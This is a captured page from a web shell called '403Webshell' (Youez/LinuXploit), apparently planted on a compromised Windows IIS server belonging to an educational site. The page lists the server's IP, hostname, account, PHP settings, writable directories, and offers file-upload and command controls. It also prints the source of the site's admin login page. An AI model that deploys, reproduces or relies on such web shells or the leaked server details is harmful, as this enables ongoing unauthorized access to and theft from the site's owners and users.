403Webshell
Server IP : 50.63.8.194  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT P3NWVPWEB026 10.0 build 17763 (Windows Server 2016) AMD64
User : IWPD_7824(SpiPanel) ( 0)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  G:/PleskVhosts/polyprep.in/mmitshamli.ac.in/home/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : G:/PleskVhosts/polyprep.in/mmitshamli.ac.in/home/adminLogin.php
<?php

error_reporting(0);
$msg=$_REQUEST['msg'];
if($msg==1)
{
	$err="Invalid Email Or Password !!!";
}
if($msg==2)
{
	$err="You have Sucessfully Logout !!!";
}
if($msg==3)
{
	$err="Unauthorised Access for this Page !!!";
}
if($msg==4)
{
	$err="Your Password is Changed Sucessfully !!!";
}
?>
<?php
$title = "Admin Login";
?>
<!DOCTYPE html>
<html lang="en">


<head>

    <?php
include('../home_include/header_link.php');
?>


</head>

<body>

    <div class="page-wrapper" id="page-wrapper">

        <?php
    include('../home_include/header.php');
    ?>


<!-- page content start  -->





<!-- start inner banner -->
<section class="inner-banner">
    <h1 class="font-weight-bold text-center">Admin Login</h1>
    
</section>
<!-- end inner banner -->
<section>
    <div class="container">
        <div class="row">
            <div class="col-sm-12 pt-1" style="height: 60px;">
                <?php
                if(isset($_REQUEST['msg'])){
                ?>
                <div class="alert alert-info" role="alert">
                    <?php echo $err; ?>
                </div>
                <?php
                }
                ?>
            </div>
        </div>
    </div>
    <div class="container mt-3 mb-5">
        <form action="../admin/code.php" class="form-contact" method="post">
            
            <div class="mb-3">
                <label for="exampleInputEmail1" class="form-label" style="font-weight:bold;">Email address</label>
                <input type="email" class="form-control" id="exampleInputEmail1" aria-describedby="emailHelp" placeholder="Admin Id " name="email" required="">
                <div id="emailHelp" class="form-text">We'll never share your email with anyone else.</div>
            </div>
            <div class="mb-3">
                <label for="exampleInputPassword1" class="form-label" style="font-weight:bold;">Password</label>
                <input type="password" class="form-control" id="exampleInputPassword1" placeholder="Enter Password" name="pass" required="">
            </div>

            <button type="submit" class="btn btn-info btn-lg w-100">Login</button>
        </form>
    </div>
</section>





<!-- page content end  -->







        <?php
    include('../home_include/footer.php');
    ?>


    </div>


    <?php
    include('../home_include/footer_link.php');
    ?>

</body>



</html>

Youez - 2016 - github.com/yon3zu
LinuXploit